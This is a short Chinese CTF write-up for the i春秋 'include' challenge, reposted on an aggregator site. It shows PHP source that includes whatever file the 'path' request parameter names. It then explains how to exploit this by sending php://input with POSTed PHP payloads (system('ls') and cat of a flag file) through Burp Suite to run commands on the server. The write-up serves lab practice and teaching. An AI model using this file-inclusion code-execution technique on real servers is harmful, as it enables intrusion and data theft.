美文网首页CTF练习解析
爱春秋-include

爱春秋-include

作者: 追求科技的足球 | 来源:发表于2020-03-11 10:09 被阅读0次

进去发现是一段源码:

<?php 
show_source(__FILE__);
if(isset($_REQUEST['path'])){
    include($_REQUEST['path']);
}else{
    include('phpinfo.php');
}

默认是输出了phpinfo.php,因此查看里面的漏洞,提示是文件包含,找include,发现允许url注入,允许php://input的形式,使用post传输数据。

注入一句话木马,在浏览器中后缀?path=php://input使用burpsuite:
(1)查看有什么文件:<?php echo system('ls');?>

(2)查看特殊文件里的内容:<?php system("cat dle345aae.php");?>


相关文章

网友评论

    本文标题:爱春秋-include

    本文链接:https://www.haomeiwen.com/subject/xancqhtx.html

    延伸阅读

    深度阅读

    • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

    栏目导航

    热点阅读

    CTF练习解析

    关于我们|服务条款|联系我们|爱春秋-include|投稿指南|网站地图|RSS订阅|排版工具|手机版

    提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

    Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

    备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

    本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

    所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!